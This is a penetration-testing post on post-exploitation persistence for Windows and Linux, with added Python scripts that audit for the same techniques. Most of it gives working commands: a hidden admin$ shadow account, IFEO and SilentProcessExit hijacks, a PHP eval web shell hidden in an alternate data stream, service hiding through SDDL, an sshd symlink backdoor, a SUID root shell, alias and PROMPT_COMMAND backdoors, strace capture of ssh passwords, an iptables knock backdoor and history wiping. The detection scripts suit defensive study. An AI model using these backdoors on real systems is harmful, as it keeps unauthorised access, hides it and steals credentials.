About Pentest Persistence
TyeYeah

Persistence means keeping your access and privileges on a system after you have broken into it.

Windows

You can learn persistence methodologies and the categories of persistence (and other red teaming skills) in a penetration testing lab.

Addition:

  1. Schedule task:
  2. Shadow account: has admin privs but does not show up
  • net user admin$ Test1 /add
  • net localgroup administrators admin$ /add
  • back up HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users
  • net user admin$ /del
  • restore only the registry key-value pairs
  3. Edit the registry to change startups:

    HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon

  4. Image File Execution Options
  • find HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options
  • add a debugger to it, like:
  • reg add "hklm\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe" /v debugger /t REG_SZ /d "c:\windows\system32\calc.exe"
  • open notepad.exe, and you get calc.exe started
  • to keep it silent, you need HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit
  • configure it (needs admin privs):

    reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe" /v GlobalFlag /t REG_DWORD /d 512
    reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\notepad.exe" /v ReportingMode /t REG_DWORD /d 1
    reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\notepad.exe" /v MonitorProcess /t REG_SZ /d "c:\windows\system32\taskmgr.exe"

  5. Shift backdoor
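The registry paths above are also where a defender looks for these entries. The following is an added Python example, not code from the original post: it parses the text that reg export writes (a constructed sample is embedded) and reports IFEO Debugger values, IFEO GlobalFlag 0x200 paired with a SilentProcessExit MonitorProcess, and Run entries that do not point into Program Files or Windows. The key paths and the 512 (0x200) flag are the ones named above; the sample values, the TRUSTED_DIRS allow-list and the helper names are assumptions.

```python
"""Audit a .reg export for IFEO debugger, SilentProcessExit and Run-key persistence.

Added example: parses the text that `reg export` writes and reports the
registry values this section describes. The sample below is constructed.
"""
import re

# Constructed sample of `reg export` output (not from a real host).
SAMPLE_REG = r'''Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe]
"Debugger"="c:\\windows\\system32\\calc.exe"
"GlobalFlag"=dword:00000200

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\notepad.exe]
"ReportingMode"=dword:00000001
"MonitorProcess"="c:\\windows\\system32\\taskmgr.exe"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\iexplore.exe]
"DisableExceptionChainValidation"=dword:00000000

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"OneDrive"="C:\\Users\\u\\AppData\\Local\\Microsoft\\OneDrive\\OneDrive.exe /background"
"updater"="C:\\Users\\Public\\svc.exe"
'''

# Key fragments are compared lower-cased because registry paths are case-insensitive.
IFEO = "\\software\\microsoft\\windows nt\\currentversion\\image file execution options\\"
SPE = "\\software\\microsoft\\windows nt\\currentversion\\silentprocessexit\\"
RUN = "\\software\\microsoft\\windows\\currentversion\\run"
FLG_MONITOR_SILENT_PROCESS_EXIT = 0x200          # the 512 written by the reg add above
TRUSTED_DIRS = ("\\program files", "\\windows\\")  # assumption: tune for your baseline


def parse_reg(text):
    """Map each [key] to a dict of its values (REG_SZ and REG_DWORD decoded)."""
    keys, current = {}, None
    for line in text.splitlines():
        line = line.strip()
        m = re.fullmatch(r"\[(.+)\]", line)
        if m:
            current = m.group(1)
            keys[current] = {}
            continue
        m = re.fullmatch(r'"([^"]+)"=(.*)', line)
        if m and current is not None:
            name, raw = m.groups()
            if raw.startswith("dword:"):
                keys[current][name] = int(raw[6:], 16)
            elif len(raw) >= 2 and raw[0] == raw[-1] == '"':
                keys[current][name] = raw[1:-1].replace("\\\\", "\\")
            else:
                keys[current][name] = raw        # hex:/expand: values left as written
    return keys


def value(values, name):
    """Case-insensitive value lookup (value names are not case-sensitive either)."""
    for n, v in values.items():
        if n.lower() == name.lower():
            return v
    return None


def audit(keys):
    """Return (category, subject, detail) tuples for the entries worth reviewing."""
    findings = []
    lowered = {k.lower(): v for k, v in keys.items()}
    spe = {k.rsplit("\\", 1)[1]: v for k, v in lowered.items() if SPE in k}
    for k, v in lowered.items():
        if IFEO in k:
            exe = k.rsplit("\\", 1)[1]
            dbg = value(v, "Debugger")
            if dbg:
                findings.append(("ifeo-debugger", exe, dbg))
            flag = value(v, "GlobalFlag") or 0
            mon = value(spe.get(exe, {}), "MonitorProcess")
            if flag & FLG_MONITOR_SILENT_PROCESS_EXIT and mon:
                findings.append(("silent-process-exit", exe, mon))
        elif k.endswith(RUN):
            for name, cmd in v.items():
                if not any(d in str(cmd).lower() for d in TRUSTED_DIRS):
                    findings.append(("run-entry", name, cmd))
    return findings


if __name__ == "__main__":
    for finding in audit(parse_reg(SAMPLE_REG)):
        print(*finding, sep="\t")
```

On a real host, feed it reg export "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options" ifeo.reg (and the SilentProcessExit and Run keys); reg export writes UTF-16, so read the file with encoding="utf-16" before passing the text to parse_reg.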

Hide tech

  1. Hide file
  • Use attrib +s +a +h +r D:\test\project\test.txt to add the system, archive, hidden and read-only attributes.
  • Use an ADS (alternate data stream): echo ^<?php @eval($_POST['chopper']);?^> > index.php:hidden.jpg, then notepad index.php:hidden.jpg to check the content.
  • Driver-class hiding: Easy File Locker

    # if the file cannot be found but these exist in the system dir:
    c:\WINDOWS\xlkfs.dat
    c:\WINDOWS\xlkfs.dll
    c:\WINDOWS\xlkfs.ini
    c:\WINDOWS\system32\drivers\xlkfs.sys
    # to clean it up
    > sc qc xlkfs
    > net stop xlkfs
    > sc delete xlkfs
    # then delete those files in the system dir and restart

  • There are many other ways, but fileless attacks are becoming popular
  2. Hide account
  • Create a shadow account
  3. Port reuse
  • victim: winrm set winrm/config/service @{EnableCompatibilityHttpListener="true"}
  • attacker: winrs -r:http://x.x.x.x -u:administrator -p:passwd whoami
  • this leaves a footprint in the log
  4. Hide service
  • using SDDL (Security Descriptor Definition Language, which can change an object's DACL): sc.exe sdset test "D:(D;;DCLCWPDTSD;;;IU)(D;;DCLCWPDTSD;;;SU)(D;;DCLCWPDTSD;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)"
  • remove the added SDDL statements to recover: & $env:SystemRoot\System32\sc.exe sdset auto_calc "D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)"
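The SDDL strings above are only opaque until decoded, and decoding them is how you spot a hidden service in a sc sdshow dump. The following is an added Python example, not code from the original post: a small parser for service security descriptors that maps the two-letter SDDL rights to service access rights and reports which principals a deny ACE blocks from SERVICE_QUERY_STATUS (LC), the right whose denial keeps sc query and services.msc from listing the service for them. The two SDDL strings are the ones from this section; the rights mapping is the standard one for service objects; the function names are assumptions.

```python
"""Decode a service SDDL string and report who is denied SERVICE_QUERY_STATUS.

Added example (not from the original post). Service objects interpret the
generic SDDL two-letter rights as the service-specific rights listed below.
"""
import re

SERVICE_RIGHTS = {
    "CC": "SERVICE_QUERY_CONFIG", "DC": "SERVICE_CHANGE_CONFIG",
    "LC": "SERVICE_QUERY_STATUS", "SW": "SERVICE_ENUMERATE_DEPENDENTS",
    "RP": "SERVICE_START", "WP": "SERVICE_STOP", "DT": "SERVICE_PAUSE_CONTINUE",
    "LO": "SERVICE_INTERROGATE", "CR": "SERVICE_USER_DEFINED_CONTROL",
    "SD": "DELETE", "RC": "READ_CONTROL", "WD": "WRITE_DAC", "WO": "WRITE_OWNER",
}
WELL_KNOWN_SIDS = {"IU": "Interactive", "SU": "Service", "BA": "Administrators",
                   "SY": "SYSTEM", "WD": "Everyone", "AU": "Authenticated Users"}
ACE_TYPES = {"A": "allow", "D": "deny", "AU": "audit"}
# (type;flags;rights;object_guid;inherit_object_guid;sid)
ACE_RE = re.compile(r"\(([^;]*);([^;]*);([^;]*);([^;]*);([^;]*);([^)]*)\)")

# The two strings from this section: the hiding DACL and the restore DACL.
HIDE_SDDL = ("D:(D;;DCLCWPDTSD;;;IU)(D;;DCLCWPDTSD;;;SU)(D;;DCLCWPDTSD;;;BA)"
             "(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)(A;;CCLCSWRPWPDTLOCRRC;;;SY)"
             "(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)")
RESTORE_SDDL = ("D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)"
                "(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)"
                "S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)")


def parse_aces(body):
    """Split an ACE list such as (D;;DCLC;;;IU)(A;;CC;;;SY) into dicts."""
    aces = []
    for ace_type, flags, rights, _obj, _inh, sid in ACE_RE.findall(body):
        if rights.lower().startswith("0x"):
            decoded = [rights]                                   # raw hex access mask
        else:
            decoded = [rights[i:i + 2] for i in range(0, len(rights), 2)]
        aces.append({"type": ACE_TYPES.get(ace_type, ace_type), "flags": flags,
                     "rights": decoded, "sid": sid})
    return aces


def parse_sddl(sddl):
    """Return owner, group, DACL and SACL of an SDDL string (O:, G:, D:, S: parts)."""
    sd = {"owner": None, "group": None, "dacl": [], "sacl": []}
    for comp, body in re.findall(r"([OGDS]):(.*?)(?=[OGDS]:|$)", sddl):
        if comp == "O":
            sd["owner"] = body
        elif comp == "G":
            sd["group"] = body
        elif comp == "D":
            sd["dacl"] = parse_aces(body)
        else:
            sd["sacl"] = parse_aces(body)
    return sd


def hidden_from(sddl):
    """SIDs that a deny ACE blocks from SERVICE_QUERY_STATUS (LC): the service is
    not listed for them by sc query / services.msc."""
    return sorted({a["sid"] for a in parse_sddl(sddl)["dacl"]
                   if a["type"] == "deny" and "LC" in a["rights"]})


def describe(sddl):
    """Human-readable DACL lines, one per ACE."""
    lines = []
    for a in parse_sddl(sddl)["dacl"]:
        who = WELL_KNOWN_SIDS.get(a["sid"], a["sid"])
        rights = ", ".join(SERVICE_RIGHTS.get(r, r) for r in a["rights"])
        lines.append(f"{a['type']:5} {who}: {rights}")
    return lines


if __name__ == "__main__":
    print("\n".join(describe(HIDE_SDDL)))
    print("hidden from:", hidden_from(HIDE_SDDL))      # ['BA', 'IU', 'SU']
    print("after restore:", hidden_from(RESTORE_SDDL))  # []
```

To sweep a host, run sc sdshow <name> for each service (or read the Security value under HKLM\SYSTEM\CurrentControlSet\Services\<name>) and pass the string to hidden_from; any service whose result is non-empty deserves a look, since no normal service denies Administrators the right to query its status.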

Linux

Backdoors

  1. Timed task:
  • one time: at
  • run periodically: crontab (crond process)
  • anacron
  2. sshd soft link
  • victim: ln -sf /usr/sbin/sshd /tmp/su; /tmp/su -oPort=5555;
  • attacker: ssh root@x.x.x.x -p 5555 with any password
  3. SUID shell
  • as root: cp /bin/bash /dev/.rootshell
  • then run: chmod u+s /dev/.rootshell
  • a normal user can then execute /dev/.rootshell
  4. alias to start a backdoor
  • alias cat='cat&&/root/.shell'
  • similar to the sshd soft link
  5. PAM backdoor
  • patch pam_unix_auth.c to capture passwords
  6. PROMPT_COMMAND backdoor
  • PROMPT_COMMAND is executed before each prompt, i.e. before you run your commands
  • export PROMPT_COMMAND="your_cmd"
  7. ssh login without a password
  • write id_rsa.pub into ~/.ssh/authorized_keys
  8. ssh wrapper
  9. ssh keylogger
  10. strace to listen to ssh source traffic
  • (strace -f -F -p $(ps aux|grep "sshd -D"|grep -v grep|awk '{print $2}') -t -e trace=read,write -s 32 2> /tmp/.sshd.log &)
  • grep -E 'read\(6, ".+\\0\\0\\0.+"' /tmp/.sshd.log
  11. And the rootkit
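Several of the backdoors in this list (the SUID shell, the alias, PROMPT_COMMAND) leave a footprint that is cheap to check for. The following is an added Python example, not code from the original post: audit_rc() scans shell rc-file text for aliases that chain a second command or reference a hidden path and for any PROMPT_COMMAND or LD_PRELOAD assignment, and audit_suid() takes the output of find / -perm -4000 -type f and reports binaries outside the usual system directories or under hidden paths. The .bashrc and find output are constructed samples; the SUID_ALLOWED directory list and the function names are assumptions to tune per distribution.

```python
"""Audit shell rc files and SUID listings for the Linux backdoors above.

Added example (not from the original post). Samples are constructed; the
allow-list of SUID directories is an assumption to tune per distribution.
"""
import re

# Constructed sample ~/.bashrc (not from a real host).
SAMPLE_BASHRC = """\
# constructed sample ~/.bashrc
export PATH=$PATH:$HOME/bin
alias ll='ls -alF'
alias cat='cat&&/root/.shell'
export PROMPT_COMMAND="/tmp/.x/run >/dev/null 2>&1"
"""

# Constructed output of: find / -perm -4000 -type f 2>/dev/null
SAMPLE_SUID_LIST = """\
/usr/bin/sudo
/usr/bin/passwd
/usr/lib/openssh/ssh-keysign
/dev/.rootshell
/tmp/.hidden/su
"""

ALIAS_RE = re.compile(r"^\s*alias\s+([A-Za-z0-9_.-]+)=(.*)$")
HOOK_RE = re.compile(r"^\s*(?:export\s+)?(PROMPT_COMMAND|LD_PRELOAD)=(.*)$")
CHAIN_RE = re.compile(r"&&|\|\||;|\||\$\(|`")      # a second command chained into an alias
HIDDEN_PATH_RE = re.compile(r"(^|/)\.[^/]+(/|$)|^/(tmp|var/tmp|dev|dev/shm)/")
SUID_ALLOWED = ("/usr/bin/", "/usr/sbin/", "/bin/", "/sbin/", "/usr/lib/", "/usr/libexec/")


def unquote(s):
    """Strip one pair of matching shell quotes from an assignment value."""
    s = s.strip()
    if len(s) >= 2 and s[0] == s[-1] and s[0] in "'\"":
        return s[1:-1]
    return s


def audit_rc(text):
    """Return (line, kind, name, value) for alias and env hooks worth reviewing."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        m = ALIAS_RE.match(line)
        if m:
            name, body = m.group(1), unquote(m.group(2))
            if CHAIN_RE.search(body) or HIDDEN_PATH_RE.search(body):
                findings.append((lineno, "alias-chain", name, body))
            continue
        m = HOOK_RE.match(line)
        if m:   # any PROMPT_COMMAND / LD_PRELOAD setting is reported; judge it by its value
            findings.append((lineno, "env-hook", m.group(1), unquote(m.group(2))))
    return findings


def audit_suid(find_output):
    """SUID binaries outside the allow-listed directories or under hidden/tmp paths."""
    paths = [p.strip() for p in find_output.splitlines() if p.strip()]
    return [p for p in paths
            if not p.startswith(SUID_ALLOWED) or HIDDEN_PATH_RE.search(p)]


if __name__ == "__main__":
    for f in audit_rc(SAMPLE_BASHRC):
        print("rc:", *f)
    for p in audit_suid(SAMPLE_SUID_LIST):
        print("suid:", p)
```

Run audit_rc over /etc/profile, /etc/bash.bashrc, /etc/profile.d/* and every user's ~/.bashrc, ~/.bash_profile and ~/.profile; a sudo-using account's rc files matter most, since an alias there runs with that user's rights on every cat.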

Hide yourself

  1. Hide files in hidden directories like /tmp/.xxx/, or name them with a prefix such as ..
  2. Hide privs using lsattr and chattr
  3. Close the history log: [space]set +o history (the leading space keeps the command itself out of history when HISTCONTROL includes ignorespace)
    • restart it with [space]set -o history
    • history -c to clear the current terminal's history
    • history|grep "xxx" && history -d [num] to delete a specific entry
  4. Port reuse
  • iptables

    # the chain
    iptables -t nat -N LETMEIN
    # the rule
    iptables -t nat -A LETMEIN -p tcp -j REDIRECT --to-port 22
    # start-switch
    iptables -A INPUT -p tcp -m string --string 'threathuntercoming' --algo bm -m recent --set --name letmein --rsource -j ACCEPT
    # stop-switch
    iptables -A INPUT -p tcp -m string --string 'threathunterleaving' --algo bm -m recent --name letmein --remove -j ACCEPT
    # let's do it
    iptables -t nat -A PREROUTING -p tcp --dport 80 --syn -m recent --rcheck --seconds 3600 --name letmein --rsource -j LETMEIN

    # start
    echo threathuntercoming | socat - tcp:192.168.28.128:80
    # ssh port 80 to login
    ssh -p 80 root@192.168.28.128
    # stop
    echo threathunterleaving | socat - tcp:192.168.28.128:80

  • SSLH
  5. Hide process: libprocesshider
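The iptables port-reuse trick above is invisible to a port scan but fully visible in the ruleset. The following is an added Python example, not code from the original post: it parses iptables-save output (a constructed sample mirroring the rules above, with the post's knock strings) and reports nat REDIRECT rules, string-match rules that set or remove a recent-list entry (the knock switches), and PREROUTING rules that gate a REDIRECT chain on that list. The option names are iptables' own; the function names are assumptions.

```python
"""Find iptables port-reuse / knock rules in `iptables-save` output.

Added example (not from the original post). The sample below is constructed
to mirror the rules in this section.
"""
import shlex

# Constructed iptables-save output; --syn is saved as an explicit --tcp-flags match.
SAMPLE_IPTABLES_SAVE = """\
# Generated by iptables-save (constructed sample)
*nat
:PREROUTING ACCEPT [0:0]
:LETMEIN - [0:0]
-A PREROUTING -p tcp -m tcp --dport 80 --tcp-flags FIN,SYN,RST,ACK SYN -m recent --rcheck --seconds 3600 --name letmein --rsource -j LETMEIN
-A LETMEIN -p tcp -j REDIRECT --to-ports 22
COMMIT
*filter
:INPUT ACCEPT [0:0]
-A INPUT -p tcp -m string --string "threathuntercoming" --algo bm --to 65535 -m recent --set --name letmein --rsource -j ACCEPT
-A INPUT -p tcp -m string --string "threathunterleaving" --algo bm --to 65535 -m recent --remove --name letmein --rsource -j ACCEPT
-A INPUT -p tcp -m tcp --dport 22 -j ACCEPT
COMMIT
"""


def parse_iptables_save(text):
    """Return one dict per -A rule: table, chain and the remaining tokens."""
    rules, table = [], None
    for line in text.splitlines():
        line = line.strip()
        if line.startswith("*"):
            table = line[1:]
        elif line.startswith("-A ") and table:
            toks = shlex.split(line)
            rules.append({"table": table, "chain": toks[1], "tokens": toks[2:]})
    return rules


def opt(tokens, name):
    """Value that follows option `name` in a rule, or None."""
    for i, t in enumerate(tokens[:-1]):
        if t == name:
            return tokens[i + 1]
    return None


def modules(tokens):
    """Match extensions loaded with -m."""
    return [tokens[i + 1] for i, t in enumerate(tokens[:-1]) if t == "-m"]


def find_port_reuse(rules):
    """Report REDIRECT targets, string-match knock switches and gated redirects."""
    findings, redirect_chains = [], {}
    for r in rules:
        t = r["tokens"]
        if r["table"] == "nat" and opt(t, "-j") == "REDIRECT":
            port = opt(t, "--to-ports") or opt(t, "--to-port")
            redirect_chains[r["chain"]] = port
            findings.append(("nat-redirect", r["chain"], port))
    for r in rules:
        t, mods = r["tokens"], modules(r["tokens"])
        if "string" in mods and "recent" in mods:
            action = "--set" if "--set" in t else "--remove" if "--remove" in t else "?"
            findings.append(("knock-switch", opt(t, "--string"), action, opt(t, "--name")))
        if "recent" in mods and "--rcheck" in t and opt(t, "-j") in redirect_chains:
            findings.append(("gated-redirect", opt(t, "--dport"),
                             redirect_chains[opt(t, "-j")], opt(t, "--name")))
    return findings


if __name__ == "__main__":
    for finding in find_port_reuse(parse_iptables_save(SAMPLE_IPTABLES_SAVE)):
        print(*finding, sep="\t")
```

A REDIRECT in the nat table pointing at 22, or any -m string rule combined with -m recent, is rare in a legitimate ruleset; on a live host pipe iptables-save into parse_iptables_save, and also check /proc/net/xt_recent/ for the letmein list, which shows which source addresses are currently unlocked.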

Addition:
To steal credentials on Linux:
Use grep -rn "password=" / to search the whole disk.
Use swap_digger to analyze swap automatically, and Impost3r to steal Linux passwords (ssh, su, sudo).

A recommended Linux post-exploitation framework: emp3r0r

Using Pentest Frameworks

  1. Metasploit Framework (run * to run all modules in meterpreter)
  • persistence module
  • metsvc module
  • scheduleme & schtasksabuse modules
  • mof_ps_persist module
  • AutoRunScript (not a module in meterpreter) and the other advanced options of the exploit module.
  2. Empire
  • It provides 18 methods in 4 categories (usemodule persistence/ to see them):
    elevated: registry*, schtasks*, wmi*, wmi_updater*
    misc: add_netuser, add_sid_history*, debugger*, disable_machine_acct_change*, get_ssps, install_ssp*, memssp*, skeleton_key*
    powerbreach: deaduser, eventlog*, resolver
    userland: backdoor_lnk, registry, schtasks
  3. Cobalt Strike
  • produce a PowerShell backdoor: Attacks -> Web Drive-by -> Scripted Web Delivery
  • add startups into a service or the registry using the given shell
  4. other frameworks …

Other resources
